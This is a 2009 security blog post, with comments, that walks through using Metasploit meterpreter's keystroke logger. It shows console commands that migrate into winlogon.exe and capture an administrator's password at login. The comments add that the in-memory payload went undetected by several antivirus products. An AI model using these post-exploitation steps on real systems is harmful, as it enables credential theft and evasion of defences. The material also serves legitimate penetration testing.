Tuesday, March 24, 2009

Password Sniffing the Metasploit Way

H.D. Moore continues to kick some major bum with some of his recent updates to the Metasploit Framework. Most notably is the keystroke logger addition to the meterpreter console. For those of you not aware of what meterpreter is, it's a payload that gets delivered to the system somehow (i.e. buffer overflow, executable, etc.) and is really a swiss army knife for post-exploitation. With the latest svn update you can migrate to an already existing process like winlogon.exe and capture all keystrokes for individuals logging into a system. Pretty sweet stuff. I got to play with it this afternoon and its extremely simple, once in the meterpreter console do the following:

meterpreter> ps

Process list

PID Name Path

--- ---- ----
401 winlogon.exe \??C:\WINNT\system32\winlogon.exe

meterpreter> migrate 401

[*] Migrating to 401...
[*] Migration completed successfully.

meterpreter> keyscan_start
Starting the keystroke sniffer...

**** A few minutes later after an admin logs in ****

meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!

I.e. the ohnoes = password.

Of course this isn't just limited to the winlogon.exe, you can nail explorer.exe and intercept keystrokes from already logged in users.

More great stuff from the Metasploit framework, enjoy!


Matt Davis said...

Have you done any testing against AV, HIPS, or FIM to see if they detect this? Since I don't quite know how this 'injection' occurs, I figured I would ask.

jshmoe12 said...

This is a very interesting update for metasploit. H.D. Moore is a genius. I have been going to school for computer networking and I am a very into computer security. H.D has been a great role model in my journey through security. Also rel1k has been a great example of what clever minds can come up with. Keep up the great work securestate.


Dave Kennedy said...

jshmoe12, thanks a ton man! Thanks for the great feedback!

Dave Kennedy said...


When meterpreter gets loaded onto the system its all done through memory, anti-virus at that point is pretty much useless. I have tested the keystroke logger against kaspersky, avg, and symantec without a prob :)

Dave Kennedy said...

Something like CSA should detect this since it hooks all system calls but cannot verify.